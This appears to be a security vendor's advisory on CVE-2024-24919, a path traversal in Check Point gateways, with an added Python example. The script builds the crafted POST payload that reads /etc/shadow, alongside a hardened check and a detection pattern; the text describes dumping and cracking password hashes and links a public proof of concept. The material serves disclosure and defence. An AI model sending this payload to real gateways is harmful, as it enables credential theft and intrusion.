Critical Path Traversal Vulnerability in Check Point Security Gateways (CVE-2024-24919)
Overview
The SonicWall Capture Labs threat research team became aware of an exploited-in-the-wild information disclosure vulnerability affecting Check Point Security Gateways. Identified as CVE-2024-24919 and given a CVSSv3 score of 8.6, the vulnerability is more severe than its label suggests: although classified as a sensitive information disclosure, it is a path traversal bug that yields an arbitrary file read, letting an unauthenticated remote attacker retrieve any file on the gateway. A proof of concept is publicly available on GitHub. A gateway is affected only if the Remote Access VPN or Mobile Access Software Blade is enabled. Check Point has released a hotfix, and it should be applied immediately.
Technical Overview
The flaw is a path traversal bug in the “/clients/MyCRL” endpoint, reachable through a crafted POST request whose body contains the string “CSHELL/”. The handler checks for that marker with “strstr”, which matches the substring anywhere in the body rather than only as the leading directory, and the body is then used as a file path without any further sanitization or validation of the user input. An attacker can therefore place arbitrary text before the marker and “../” sequences after it (Figure 1) to walk out of the intended directory and read sensitive files such as /etc/shadow, which holds the system's password hashes. For our analysis, we used version R80.
Figure 1: Vulnerable Code
To trigger and exploit this vulnerability, an attacker sends a POST request to the endpoint whose body contains the string “CSHELL/” followed by a path traversal sequence such as “../” and the target file. This takes only a few lines of Python, as shown in the publicly available PoC and in Figure 2 below, where “path” is the file the attacker wants to read.
Figure 2: Creating a POST request to obtain sensitive information
Using this code, we dumped the gateway's “/etc/shadow” file and obtained the system's hashed credentials, as seen in Figure 3. An attacker can then attempt to crack these hashes offline to gain administrative access to the firewall. The read is not limited to /etc/shadow; any file on the system can be retrieved. Note that the request was sent to the WAN interface, so the vulnerability is reachable over the Internet.
Figure 3: Dumping Hashed Credentials
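The request construction shown in Figure 2 and the resolution flaw behind it, as an added example that is not the SonicWall write-up's code nor the public PoC: it builds the crafted POST offline, models the strstr()-style gate beside a hardened check that anchors on the resolved path, and runs an IPS-style detection over the raw request. The document root /var/www, the padding in the payload, the HTTP headers and the function names are assumptions made so the example runs without a gateway; the vulnerable_resolve function is a model of the described behaviour, not the gateway's actual code, and nothing is sent over the network.

```python
"""Added example: crafted request, flawed gate, hardened gate, detection.

Not the write-up's code nor the public PoC. The document root, the payload
layout and the HTTP headers are assumptions so the example runs offline.
"""
import posixpath
import re
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www"        # assumed document root, not taken from the page
ENDPOINT = "/clients/MyCRL"  # vulnerable endpoint named in the write-up
MARKER = "CSHELL/"           # string the handler looks for with strstr()


def exploit_body(path: str) -> str:
    """Body of the crafted POST: junk before the marker (strstr still finds
    it), then enough '../' to climb out of any web root, then the target."""
    return f"a{MARKER}" + "../" * 7 + path.lstrip("/")


def build_request(host: str, path: str) -> bytes:
    """Raw HTTP request in the shape the write-up describes (constructed)."""
    body = exploit_body(path)
    return (
        f"POST {ENDPOINT} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"\r\n{body}"
    ).encode()


def vulnerable_resolve(body: str) -> Optional[str]:
    """Model of the flawed gate: a substring test for the marker, then the
    body is joined onto the web root as-is. The '..' components are honoured
    by the filesystem, so the resolved path can leave WEB_ROOT entirely."""
    if MARKER not in body:                # strstr(body, "CSHELL/") != NULL
        return None
    return posixpath.normpath(posixpath.join(WEB_ROOT, body))


def safe_resolve(body: str) -> Optional[str]:
    """Hardened form: decode once, reject NUL, normalise, then require the
    result to sit under WEB_ROOT/CSHELL/ rather than merely contain the marker."""
    rel = unquote(body)
    if "\x00" in rel:
        return None
    full = posixpath.normpath(posixpath.join(WEB_ROOT, rel))
    allowed_prefix = posixpath.join(WEB_ROOT, MARKER)   # '/var/www/CSHELL/'
    if not full.startswith(allowed_prefix):
        return None
    return full


# traversal in raw or percent-encoded form, with '/' or '\' separators
TRAVERSAL = re.compile(r"(?:\.\.|%2e%2e|\.%2e|%2e\.)(?:/|\\|%2f|%5c)", re.I)


def detect(raw: bytes) -> bool:
    """Detection logic in the spirit of the IPS signature: a POST to the
    endpoint whose body carries the marker together with a traversal
    sequence. Benign downloads under CSHELL/ do not match."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split(" ")
    if len(parts) < 2 or parts[0] != "POST" or not parts[1].startswith(ENDPOINT):
        return False
    text = body.decode("latin-1")
    return MARKER in text and TRAVERSAL.search(text) is not None


if __name__ == "__main__":
    req = build_request("gateway.example.invalid", "/etc/shadow")
    body = exploit_body("/etc/shadow")
    print(req.decode())
    print("flawed gate opens:   ", vulnerable_resolve(body))   # /etc/shadow
    print("hardened gate opens: ", safe_resolve(body))         # None
    print("IPS-style detection: ", detect(req))                # True
```

Run the file directly to print the crafted request and the three verdicts. The hardened check decides on the resolved absolute path (it must begin with WEB_ROOT/CSHELL/) instead of on substring presence, which is what makes the leading junk and the run of “../” irrelevant; the detection regex also catches percent-encoded dot-dot and backslash variants that a literal match on “../” would miss.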
SonicWall Protections
To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:
- IPS: 4440 Check Point Security Gateway Path Traversal
Remediation Recommendations
Check Point gateway users are advised to apply the hotfix linked in the advisory immediately; Check Point has labeled it a mandatory patch to underline the criticality of the fix. Because the bug exposes password hashes and was exploited in the wild before the fix was available, treat local credentials on any Internet-exposed gateway as potentially compromised and rotate them after patching.
Relevant Links
- https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- https://support.checkpoint.com/results/sk/sk182336
- https://github.com/LucasKatashi/CVE-2024-24919/blob/main/CVE-2024-24919.py